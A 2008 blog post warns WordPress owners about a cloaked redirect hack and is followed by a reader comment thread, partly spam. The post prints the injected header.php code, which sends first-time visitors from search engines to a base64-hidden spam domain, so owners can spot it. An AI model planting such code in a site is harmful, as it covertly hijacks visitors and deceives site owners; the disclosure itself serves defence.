WordPress Redirect h4x’s

by Jeremy Schoemaker on June 9, 2008 · 74 comments

Lately I have noticed some peoples blogs had been redirecting to some spammy landing page when you goto them from Google. I notified them about it and they thought I was nuts… cause they could not reproduce it.

Donncha (wish your girlfriend was hot like me(sorry)) O Caoimh well known wordpress developer has made a great post about how sites are hacked and also what to look for.

Donncha also has pinpointed the redirect and cookie hack which is very difficult to detect but what I have suspected has been going on:

[php]

< ?php $seref=array("google","msn","live","altavista","ask","yahoo","aol","cnn","weather","alexa");

$ser=0; foreach($seref as $ref) if(strpos(strtolower($_SERVER['HTTP_REFERER']),$ref)!==false){ $ser="1"; break; }

if($ser=="1" && sizeof($_COOKIE)==0){ header("Location: http://".base64_decode("YW55cmVzdWx0cy5uZXQ=")."/"); exit; }?>
[/php]

The code above basically redirects people from your website to their choice if:

1) they are coming from a search engine or other big referral site.
2) they have never visited your site before (no cookies are set).

Its pretty slick and very hard to detect since only NEW visitors would be effected.

Make sure you check all of your blogs for that code. (in header.php)

full disclosure

About the author...

– who has written 2895 posts on ShoeMoney.com.

Jeremy "ShoeMoney" Schoemaker is the founder & CEO of the ShoeMoney Blog, Elite Retreat Internet Conference, & the PAR Program. In 2013 Jeremy released his #1 Amazon Best selling Autobiography titled "Nothing's Changed But My Change" - The ShoeMoney Story. Jeremy currently lives in Lincoln Nebraska with his wife and 2 daughters.


Anna recommends you check out these amazing posts:

  1. sportwizards How A $1295 Gambling Debt Turned Me Into An Online Marketer
  2. finger Why Do You Give A Crap About What People Think About You?
  3. flames Twitter will be as worthless as MySpace shortly

{ 67 comments }

1 Tom at the Real Estate Bloggers

So the tip off would be a large drop in search engine traffic? I know that I would notice a big drop in traffic on my sites.

2 Jeff - buzzmyblog.com

Wow. Good find. Which php file do you normally find that hack in?

3 ShoeMoney

being the redirect headers would have to be sent first it should be in your header file.

4 Jeff - buzzmyblog.com

Actually, you would probably still see the search engine traffic, right? The search engine would still send the traffic to your site, but then the hack would redirect it somewhere else.

5 ShoeMoney

Depends:

Since the file still loads on your site the hit and refer will still register in your apache log files. So log parsers would still see it.

Javascript based analytics like Google Analytics though would show a decline (since the javascript is not proccessed)

BUT this hacker could simply have a iframe with your site loaded on his redirect and your stats would look the exact same.

6 Donncha O Caoimh

har, har :P

I really must do that “how to pronounce my name” video…

7 ShoeMoney

I am sorry I could not help myself.

Really though hats off great post.

8 Tyler Ingram

I know this is a bit picky with code but you could of also showing it using using in_array() instead of a foreach loop ;) But then again you were just showing how it could be done.

9 CPA Affiliates

good tip man. there will always be hackers just have to out think them :)

10 Jonathan Volk

Thanks for the tip! I am checking it out now.

11 Jonathan Volk

ROFL. I loved the joke.

12 ShoeMoney

Actually I was quoting the exploit exactly to show people what to look for.

13 Sports Picks

Very clever! I guess another way to detect it will be to clear the browser cookies for your site (I personally use the Add N Edit Cookies plugin for Firefox), then google your site and click a link and see what happens.

14 Paul

grrr. These guys are slick.

15 Stak Loaded - How to make money doing nothing!

How do they get that onto your site?

16 Michael D

Any suggestions on a search string to search multiple blogs on single server? For wordpress looking in header.php correct?

17 Steve McGrath

I was expecting that you were going to talk about “wp-stat-php” which gave the same symptoms. Zero traffic from Google. One of my blog got it last week. People using Google could not access it and I could not even login into my blog. I wrote a post about it to that others learn about this one. I got the worst case of “wp-stat-php” .

Removing wp-stats-php

I since upgraded my whole blog network to be safer. Those with niche or not often updated could lose money/time. I sure did. :(

So, people, upgrade to the latest version of WP.

Yours is another example of someone using a security weakness.

Do you know if it was with WP 2.5.1?

18 Apoorv

How do the hackers edit that thing ?

19 Website Reveiws

I would also like to know this! Is there some sort of security exploit in WP that needs to be patched?

20 Aaron Kronis

Thanks for looking out for us all shoe…

21 it gossips

I’ve decoded the base 64 code and the link is pointing to anyresults.net. :D LOL. Thanks for great example!
Now the only problem is how to inject this script to wordpress blogs. Using old versioned wordpress bugs is a great idea. But I won’t do it :D

22 Merlin

Two things, first and most relevent; how is this code inserted into the header page?

Second, please stop slandering hackers. I will not bother reiterating what others have said before me; enjoy a message from Stallman [with a note or two from me]:
This letter is not meant for publication, although you can publish it if you wish. It is meant specifically for you, the editor, not the public.

I am a hacker. That is to say, I enjoy playing with computers working with, learning about, and writing clever computer programs. I am not a cracker; I don’t make a practice of breaking computer security. [In fact, I make a practice of increasing computer security]

There’s nothing shameful about the hacking I do. But when I tell people I am a hacker, people think I’m admitting something naughty because news[sources] such as yours misuse the word “hacker”, giving the impression that it means “security breaker” and nothing else. You are giving hackers a bad name.

The saddest thing is that this problem is perpetuated deliberately. Your reporters know the difference between “hacker” and “security breaker”. They know how to make the distinction, but you don’t let them! You insist on using “hacker” pejoratively. When reporters try to use another word, you change it. When reporters try to explain the other meanings, you cut it.

Of course, you have a reason. You say that readers have become used to your insulting usage of “hacker”, so that you cannot change it now. Well, you can’t undo past mistakes today; but that is no excuse to repeat them tomorrow.

If I were what you call a “hacker”, at this point I would threaten to crack your computer and crash it. But I am a hacker, not a cracker. I don’t do that kind of thing! I have enough computers to play with at home and at work; I don’t need yours. Besides, it’s not my way to respond to insults with violence. My response is this letter.

You owe hackers an apology; but more than that, you owe us ordinary respect.

23 Sports Picks

I guess they gain access to the server/account? Or maybe the files don’t have the proper permissions set in the first place?

24 Melvin

actually i have read it in my wordpress admin and really have looked instantly to my header.php.. thanks for the reminder though

25 Merlin

You mean crackers. Good luck outthinking actual hackers.

26 Merlin

Even with permissions they still need a way to upload the file if they edit it. Most likely the account was compromised via plaintext FTP sniffing, which is still sickeningly common.

27 Sports Picks

It looks like there are different versions of this hack, in some cases they modified the .htaccess to do the redirect…

More info here: http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

28 Joe Money

Wow, good work finding that one out. I did not know about that one.

29 Text Lingo

very helpful post. thanks!

30 Monica Livingstone

But to make this on the header.php I think you have to have the password of the web host, because how do you would make this whithout the password/

31 team ray

i think that why they are called hackers

32 ShoeMoney

completely incorrect… read the linked post.

33 ShoeMoney

hahaha please……..

Ive been a speaker at defcon and blackhat conferences and going for the last 8 years…. Was a security administrator for one of the largest banks in the world for years before that.

I know you think you sound smart quoting some dude but you come off like a asshole

34 Gav

I assume this hack finds it’s way in when you download a dodgy/free template? I’ve noticed lots of WP templates have loads of suspicious looking code in there that only looks like it’s hiding something…

35 Ken Nickless

Thanks for the info. I’m off to check my blogs now.

36 Terry Tay

The food and bad about the interenet. THe bad being always having to look out for these things…The good being blogs like this looking out for us and helping us along.
Thanks!
~Terry

37 Terry Tay

oops…The GOOD and bad…

38 Best Videos

Thanks for the update.
any way to secure our blogs ?

39 Melvin

i wish there is a plugin for it,..

40 Kevin

I have had this happen before when I clicked and ad for a site. Now I know what to look for in my own sites I am going to take a god look. Thanks Shoe.

41 Jacky Supit

yeah that’s what i use to do. oops :D

42 purposeinc

Thanks for pointing it out. Luckily I don’t have this one yet!
dk

43 Bob

thanks for posting this shoe!!

44 Georgia

I hate f**kers that can’t just do their own thing without trying to rip from others.

45 Tim Linden

The iframe would have his page as the referer then ;-)

46 Graham Langdon

dude, Shoe, I think you’re site is infected with this or something similar. I went to shoemoney.com directly from my browser, and it took me to “GetGoogleAdsFree.com” or something like that. I was like wtf? Then I typed in Shoemoney.com again and came here successfully.

Just givin you a heads up. Ironic you had a post up about it.

47 Graham Langdon

oh wow, I’m an idiot, I typed in shoemoeny.com
false alarm

48 Not John Chow

Yeah Thanks! You really are a super hero. Earned the big S ..oops $ on your shirt today.

49 Samir

Nice find Jeremy. If you clear your cache and cookies shouldn’t you see this issue when you go to your site then?

50 forumistan

Good find Jeremy. The hacker encoded his/her site to base64

51 Start Blogging

Nice find. I think I saw this once or twice lately as well.

52 Binary Ant

This sucks! these people are…bastards?

53 PPC

Quite scary, so no drop off in traffic will be allied to reduced conversions.

54 PPC

Let’s face it people, there will always be internet pirates trying to rustle your traffic. They will get caught out, their tactics will change, but one thing wont. They will always be around, and hats off to people like O Caoimh for exposing their tr5icks.

55 Web Marketeer

And thank you very much for sharing this with the community at large, Jeremy. Forewarned is forearmed.

56 Web Marketeer

An age of modern buccaneers indeed! Betcha the hairdo’s ain’t much better either!

57 Krayzie

Thanks for the heads up, Ill def check my blog for this. Thats a purty damn smart way to steal some traffic. And lmao that hacker rant was funny as hell.

58 Cash In Your Pocket...By Tomorrow

nice share, as always

59 Bonignidgiday

Давайте поменяемся постовыми? Моя почта engivelve@mail.ru

60 hermes handbags

This sucks! these people are…bastards?

61 birthday party supplies

Wonderful blog! I definitely love how it is easy on my eyes and also the facts are well written. I am wondering how I might be notified whenever a new post has been made. I have subscribed to your rss feed which ought to do the trick! Have a nice day!

62 Shemika Haislett

Hopefully the evacuation of Ocracoke island was not necessarily needed and Earl juststays out at sea. Let us pray for that.

63 apb aimbot

Thank you for the awesome post. It reminds me that I’ve got to add extra structure in to my blogging. I’ve really enjoyed what you take the time to write here. When you’ve got a little time, would you tell me a way to get your RSS feed?

64 Ewa Malay

the party supplies that we buy are cheap and they use earth friendly products too ~-;

65 Maximum Leverage

It’s difficult to find experienced people on this topic, however, you seem like you know what you’re talking about! Thanks

66 Internet Marketing

An intriguing discussion is definitely worth comment. I do think that you ought to publish more about this subject matter, it might not be a taboo matter but generally people do not talk about such topics. To the next! Best wishes!!

67 christian louboutin sale

“Walk!”

Previous post:

Next post: